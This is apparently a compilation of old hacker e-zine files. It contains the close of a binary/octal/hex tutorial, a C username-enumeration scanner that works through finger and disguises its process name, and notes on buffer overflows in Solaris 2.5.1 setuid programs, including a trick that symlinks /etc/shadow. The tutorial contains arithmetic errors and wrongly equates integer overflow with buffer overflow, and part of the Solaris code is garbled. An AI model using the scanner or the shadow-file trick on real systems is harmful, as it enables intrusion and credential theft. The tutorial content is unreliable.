come in handy when you can't remember a conversion or the number is really weird. As you may of guessed, or may not have, octal numbers use up 8 bits per number, because they are ultimately stored as zeros and ones. The number 7 in octal is just 7, but to store it it takes 8 bits, or 00000111. Counting Hexadecimal ----------------------- Hexadecimal, or HEX as it's better known, is base 16. Now as you gather from octal numbers, when you change bases you need a new set of numbers to count with. Base 16 has 16 numbers, like octal has 8 and binary has 2. They are:0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F. Why A-F instead of maybe something else? Well the letters A-F are well known and are in order, so for simplicity the makers of HEX used them. Like octal and binary we can use a column chart to count in HEX. 4096 256 16 1 16^3 | 16^2 | 16^1 | 16^0 ------------------------------------------- 0 = 0 1 = 1 2 = 2 3 = 3 4 = 4 5 = 5 6 = 6 7 = 7 8 = 8 9 = 9 A = 10 B = 11 C = 12 D = 13 E = 14 F = 15 1 0 = 16 1 1 = 17 1 E = 30 8 5 = 133 As you can see, HEX is a little more complicated and takes practice to get used to. Even when you can effectively understand the numbers, sometimes you still need a calculator or a program, like a HEX editor to read them because of their sizes and complexities. Quick Lesson on Conversions ------------------------------ I know that a natural question has to be if there is an easier way to convert between the bases, and luckily there is. I'll give a quick lesson, as it's pretty simple. binary numbers can be 1 bit, and octal numbers can be made up from 3 bits on binary. HEX, likewise, can be made from 4 bits of binary. It's easier to show: Lets say we have a number, 62, In binary it's: 0 1 1 1 1 1 0, and to convert to octal, we group it into 3 bit segments, from the right, and read it: 0 (1 1 1) (1 1 0). We can ignore the leading 0. So in octal we read it in binary, 1 1 1 = 7, and 1 1 0 = 6, so in octal it's 76. Let's use 62 again and find HEX. This time we group in 4s, from the right, like so: (0 1 1) (1 1 1 0), since the first term has only 3 terms we can add a leading 0, but it will not make any difference to the outcome. Read the groups, 0 1 1 = 3, and 1 1 1 0 = E, so in HEX it's 3E. 0 1 1 1 1 1 0 - Binary 0 ( 1 1 1 ) ( 1 1 0 ) - Octal ( 0 1 1 ) ( 1 1 1 0 ) - Hex If you're clever you can figure out how to convert from any of the 3 to any of the others with minimal effort. Signed Numbers ------------------ How do computers know if a number is positive or negative if all it sees is zeros and ones? Well for the purpose of this article I'll keep it simple and use binary, as octal and HEX can get very complex. Before we go any further I have to explain what complementary systems are as we are going to be using base complements to determine signs. A base complement is when you take the largest number in a numbering system and subtract from it. For example, say we are in normal everyday base 10, and we have the number 1267. If we want to find it's complement we would take the largest number in base 10s number system, a 9, and subtract each number from it. 9999 - 1267 ---------- 8732 So 8732 is the complement to 1267. Lets try binary. Since binary is base 2, then the largest number is 1. Say we have the number, 62 again, in binary, 0 1 1 1 1 1 0, let find it's compliment. 1111111 - 0111110 --------------- 1000001 = 37 So we see that 37, or 1 0 0 0 0 0 1, is the complement to 62, or 0 1 1 1 1 1 0. Using complements we can sign a number as negative or positive. How? Well all positive numbers will be in true form, like 62 will be 0 1 1 1 1 1 0, but if we had a negative 62, we would use it's complement, or 1 0 0 0 0 0 1. "Hold on" you say, "1 0 0 0 0 1 is 37!". Not anymore, as binary numbers use a signed bit, or the first bit to determine if a number is positive or negative. The first bit is used to tell this, if it's a 1 it's signed negative, if it's a 0 it's signed positive. So how do we get 37? Add a leading 0, 0 1 0 0 0 0 0 1; now that's 37 and 1 0 0 0 0 0 1 is a negative 62. Once the computer sees the leading bit is a 1, it knows it's dealing with a negative number. An easy way to remember how it works, if the first bit is a 1, that find out what is the column value for that bit, so in 62 the first bit would be a 64, or 2^6. Since the binary number 0 1 0 0 0 0 0 0 is 64, and 0 1 1 1 1 1 1 1 is 63, then if we us 1 0 0 0 0 0 1 as negative 62 we can think of the first slot as a negative number, or the first bit as the negative and everything else positive. Say the first bit is a negative 64 instead of a positive 64, then subtract 1 because we are in reverse, then subtract for each other 1, the number of that column, so in this example, we would subtract 1 more for the 1 in the first column giving us negative 62. It can get complicated, but it just takes a little practice. Why practice? Why care about all this crap? Beside the fact it will help you later on down the road for those of you planning on going to college to continue your schooling in computers, it's very helpful in hacking to know this to. The Buffer Overflow ------------------------ I'm going to make a very simple example of what a buffer overflow is and how it happens and what it has to do with all these numbers and number systems. Well for this articles purpose let use a very simplistic 4 bit number in binary. As some of you know modern buffer overflow attacks are in HEX, or as the exploit code calls it, Assembly, which is actually wrong. Ok, say we have a number, and we want to do some addition, the numbers 3 and 6 using 4 bits. 0 1 1 0 = 6 + 0 0 1 1 = 3 ------------ 1 0 0 1 = - 7 Hold on, 3 + 6 = -7? In 4 bits the computer thinks that this number is 9, but 4 bits can't hold the number 9, and it comes up with negative 7. Whammo! Buffer Overflow. Most computers from the 8086 and up have a flag that indicates if a buffer overflow has occured or not, but if the code has not been carefully designed, skillful coders can find and exploit codes that are vurnerable, and they do every day. Filling up buffers with numbers in HEX that a larger then a buffer was designed to handle, crashing programs, racing for root. Conclusions ---------------- I hope I've made clear how to understand binary, octal and HEX number systems; how to read them, how to manipulate them back and forth, and how they sign numbers so one may perform basic mathematical operations. I also hope, if you learned anything, is how important it is to understand these number systems and how they tie into hacking and your future down the road. I am a firm believer that if you learn the basics then the hard stuff will be easy.... Bronc Buster!!! Thanks to RLoxley, NeTJaMMr and Perhillion for helping proof this. [EOF] ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Mail server username scanner - scan.c by memor /* Make a usernames lists from a file, to an host, via Fingers.. for any use.. example: scan userfile mail.server.to.scan.net or to save it in an outpout file : scan userfile mail.server.to.scan.net > result have fun with that little thing... memor/hbs - sjta */ #include #include #include void main(int argc,char *argv[]) { /* define file handle , strings */ FILE *nombre1; char *nom; char *commande; char *dnsip; int fin; int test; /* create stacks */ nom = (char *)malloc(30); commande = (char *)malloc(30); dnsip = (char *)malloc(50); fin=0; /* do we have enough arguments ? no ? */ if (argc<3) { printf("Scans for usernames with finger.. memor(hbs/sjta) \nusage : %s userfile host\n",argv[0]); /* ok bye.. not enough arguments */ exit(1); } /* we have enough.. we can now work :) */ if (argc>2) { nombre1=fopen(argv[1],"r"); /* can we open that file ? /* if(nombre1==NULL) { printf("Can't open the file!!\n"); /* no? ok bye.. :) */ exit(1); } /* saving some arguments and hiding the programm */ sprintf(dnsip,"%s",argv[2]); sprintf(argv[0],"joe "); sprintf(argv[1]," "); sprintf(argv[2]," "); /* while we reach the end of file :) */ while(fin!=1) { /* i catch the username and wait test for the end of file */ test=fscanf(nombre1,"%s",&nom[0]); if(test==EOF) fin=1; else { /* i attempt a finger to see if we got an existant username */ sprintf(commande,"finger %s@%s",nom,dnsip); printf("Scanning for [%s] ..\n%s\n",nom,commande); system(commande); } } /* closing input file of usernames */ fclose(nombre1); } } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Vuls in Solaris 2.5.1 by Shok Although there are vulnerabilities known in rlogin and chkey, these are unrelated to them. rlogin: They have the following code (which is pathetic might I add): char *p; char term[256]; [...] p=getenv("TERM"); [...] strcpy(term, p); Yah there is Sun's super security.......... sheesh the obvious fix would be a simple strncpy but NO they had to do it the secureless way ;) arp: Well this is the gethostbyname() vulnerability in solaris 2.5.0 and 2.5.1 Now as most people know, there was a vulnerability in gethostbyname, and it's sploit used rlogin. Well.....if they chmod -s'd rlogin (which would break it anyway), you could still use arp, as it is suid (although occasionally I set it sgid instead). This is a shortened version of the code: if (argc == 2) { get(argv[1]); exit(0); } get(host) char *host { [...] hp = gethostbyname(host); More great ol' Sun security eh? The sploit code for this is just a modified gethostbyname sploit. chkey: gee let's look at this one....... char program_name[256]; strcpy(program_name, argv[0]); WAHOO!!! THE BEST ONE YET! Once again great job sun...... Although I should make it clear I do like Sun.....but they are really ignorant assuming people won't get ahold of the source so they don't have to use proper bounds checking....I mean that should be like common sense. That's all I am going to mention.....although I will give a few.... I'm looking at cu and uucp which appear to have an overflow in there remote host and commands.......to test this you ought to just make a generic program: #include void main(int argc, char **arg) { unsigned long int i; unsigned long int num; num=atoi(argv[1]); for (;inl_name); and nl->nl_name is argv[1] if it is a macro I'm assuming. But this is expstr(): expstr(s) char *s; char buf[BUFSIZ]; [...] sprintf(buf, "%s%s%s", s, tp->n_name, tail); As described in expand.c.......it appears that you can manipulate enviromental variables like SHELL, TERM, etc.....and ~user is also a macro..you get the idea shchars = "${[*?"..... E_VARS for expanding variables....... E_SHELL... E_TILDE......so if you did rdist $SOMEVAR it will recognize the '$' and expand that variable.......I haven't been able to test this as the BUFSIZ is too big and I get disconnected if I export a variable greater than 1000 or so (weird heh...) This is also related to the message I posted to bugtraq on multiple overflows in MH-6.8.3. In ruserpass.c, in the function rnetrc().....they have the following (which has two vuls): char *hdir, buf[BUFSIZ]; hdir=getenv("HOME"); [...] sprintf(buf, "%s/.netrc", hdir); Now there are two problems with this..... First of all the obvious....is there is an overflow. Secondly, all one would have to do is for example ln -s /etc/shadow $HOME/.netrc and you could abuse that. Libc specifically says you shouldn't do this. In libcurses, in pr_headers, in print.c there is an overflow in the char *terminfo; char buf[512]; terminfo=getenv("TERMINFO") [...] sprintf(buf, "%s%s%s", terminfo..... So anything that uses libcurses (such as screen), is vulnerable. Anyway it's late, I'm tired. So that's about all for now.